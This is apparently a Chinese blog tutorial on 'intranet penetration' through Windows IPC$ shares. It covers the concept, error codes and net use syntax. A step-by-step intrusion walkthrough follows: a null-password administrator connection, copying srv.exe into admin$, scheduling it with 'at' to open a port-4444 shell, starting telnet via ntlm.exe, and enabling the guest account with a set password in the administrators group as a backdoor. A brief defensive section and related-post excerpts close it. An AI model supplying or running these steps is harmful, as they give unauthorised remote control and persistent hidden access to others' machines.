4 內網滲透之IPC 入侵

2022-06-12 21:54:18 字數 3906 閱讀 5635

ipc$連線

ipc$的概念:

ipc$(internet process connection)是共享」命名管道」的資源,它是為了讓程序間通訊而開放的

命名管道,可以通過驗證使用者名稱和密碼獲得相應的許可權,在遠端管理計算機和檢視計算機的共享資源時使用。

ipc$的作用:

利用ipc$,連線者甚至可以與目標主機建立乙個連線,利用這個連線,連線者可以得到目標主機上的目錄結構、使用者列表等資訊。
ipc$的利用條件:

1. 139

,445埠開啟

ipc$連線可以實現遠端登陸及對預設共享的訪問;而139埠的開啟表示netbios協議的應用,我們可以通過

139,

445(win2000)埠實現對共享檔案/印表機的訪問,因此一般來講,ipc$連線是需要139或445埠來支援的.

2. 管理員開啟了預設共享

預設共享是為了方便管理員遠端管理而預設開啟的共享,即所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或

windows(admin$),我們通過ipc$連線可以實現對這些預設共享的訪問

ipc$連線失敗的原因:

1.你的系統不是nt或以上作業系統.

2.對方沒有開啟ipc$預設共享。

3.不能成功連線目標的139,445埠.

4.命令輸入錯誤.

5.使用者名稱或密碼錯誤.

常見錯誤號:

1.錯誤號5,拒絕訪問 : 很可能你使用的使用者不是管理員許可權的,先提公升許可權;

2.錯誤號51,windows 無法找到網路路徑 : 網路有問題;

4.錯誤號67,找不到網路名 : 你的lanmanworkstation服務未啟動;目標刪除了ipc$;

5.錯誤號1219,提供的憑據與已存在的憑據集衝突 : 你已經和對方建立了乙個ipc$,請刪除再連。

6.錯誤號1326,未知的使用者名稱或錯誤密碼 : 原因很明顯了;

7.錯誤號1792,試圖登入,但是網路登入服務沒有啟動 : 目標netlogon服務未啟動。(連線域控會出現此情況)

8.錯誤號2242,此使用者的密碼已經過期 : 目標有帳號策略,強制定期要求更改密碼。

具體操作命令:

1.建立ipc$空連線:

net use \\127.0.0.1\ipc$ "" /user:""

2.建立完整的使用者名稱,密碼連線:

net use \\127.0.0.1\ipc$ "

password

" /user:"

username

"

3.對映路徑:

net use z: \\127.0.0.1\c$ "

密碼" /user:"

使用者名稱" (即可將對方的c盤對映為自己的z盤,其他盤類推)

4.訪問/刪除路徑:

net use z: \\127.0.0.1\c$   #直接訪問

net use c: /del 刪除對映的c盤,其他盤類推

net use * /del 刪除全部,會有提示要求按y確認

5.刪除ipc$連線:

net use \\127.0.0.1\ipc$ /del
6.入侵過程:

(1)

c:\>net use \\127.0.0.1\ipc$ "" /user:"

admintitrators

"這是用《流光》掃到的使用者名稱是administrators,密碼為"

空"的ip位址,如果是打算攻擊的話,

就可以用這樣的命令來與127.0.0.1建立乙個連線,因為密碼為"

空",所以第乙個引號處就不用輸入,

後面乙個雙引號裡的是使用者名稱,輸入administrators,命令即可成功完成。

(2)

c:\>copy srv.exe \\127.0.0.1

\admin$

先複製srv.exe上去,在流光的tools目錄下就有(這裡的$是指admin使用者的c:\winnt\system32\,

大家還可以使用c$、d$,意思是c盤與d盤,這看你要複製到什麼地方去了)。

(3)

c:\>net time \\127.0.0.1

查查時間,發現127.0.0.1 的當前時間是 2019/2/8 上午 11:00,命令成功完成。

(4)

c:\>at \\127.0.0.1

11:05

srv.exe

用at命令啟動srv.exe吧(這裡設定的時間要比主機時間快,不然你怎麼啟動啊,呵呵!)

(5)

c:\>net time \\127.0.0.1

再查查到時間沒有?如果127.0.0.1 的當前時間是 2019/2/8 上午 11:05,說明srv.exe已經執行,那就準備開始下面的命令。

(6)

c:\>telnet 127.0.0.1 4444

這裡會用到telnet命令吧,注意埠是4444。telnet預設的是23埠,但是我們使用的是srv.exe在對方計算機中為我們建立乙個4444埠的shell。

雖然我們可以telnet上去了,但是srv.exe是一次性的,下次登入還要再啟用!所以我們打算建立乙個telnet服務!這就要用到ntlm了

(7)

c:\>copy ntlm.exe \\127.0.0.1

\admin$

用copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的tools目錄中)。

(8)

c:\winnt\system32>ntlm

輸入ntlm啟動(這裡的c:\winnt\system32>指的是對方計算機,執行ntlm其實是讓這個程式在對方計算機上執行)。

當出現"

done

"的時候,就說明已經啟動正常。然後使用"

net start telnet

"來開啟telnet服務!

(9)

telnet 127.0.0.1,接著輸入使用者名稱與密碼就進入對方了,操作就像在dos上操作一樣簡單
(10)

為了以防萬一,我們再把guest啟用加到管理組    

c:\>net user guest /active:yes

將對方的guest使用者啟用

(11)

c:\>net user guest 123456

將guest的密碼改為123456,或者你要設定的密碼

(12)

c:\>net localgroup administrators guest /add

將guest變為administrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這台計算機)

7.如何防禦ipc$入侵:

net share       #檢視自己的共享

net view \\ip #檢視target的共享

netstat -a ip #獲取target的user列表

8.netstat延伸使用:

netstat -ano | findstr "

port

" #檢視埠號對應的pid

tasklist | findstr "

pid" #檢視程序號對應的程式

內網滲透實戰-ipc$入侵之遠端控制

阻止ipc 內網入侵 來,我們聊聊內網滲透!

團隊 admin team 0x00 前言 前段時間再看 metasploit 和白帽子講 web 安全,就一直想自己搭個從 web 端滲透進入內網的環境玩一下,不過因為不太懂計網的知識,拓撲圖也看不明白,搭建的過程太心酸了。趕著週末,問了群裡大佬,算是終於可以玩一下了。0x01 搭建 i春秋 fr...

阻止ipc 內網入侵 來,我們聊聊內網滲透!

0x00 前言 前段時間再看 metasploit 和白帽子講 web 安全,就一直想自己搭個從 web 端滲透進入內網的環境玩一下,不過因為不太懂計網的知識,拓撲圖也看不明白,搭建的過程太心酸了。趕著週末,問了群裡大佬,算是終於可以玩一下了。0x01 搭建 i春秋 freebuf 這裡簡單說一下我...

內網之橫向移動之IPC

ipc internet process connection 共享命名管道的資源,是為了實現程序間通訊而開放的命名管道。ipc可以通過驗證使用者名稱和密碼獲得相應的許可權。1,ipc 與空連線 不需要使用者名稱與密碼的ipc 連線即為空連線,一旦你以某個使用者或管理員的身份登陸 即以特定的使用者名...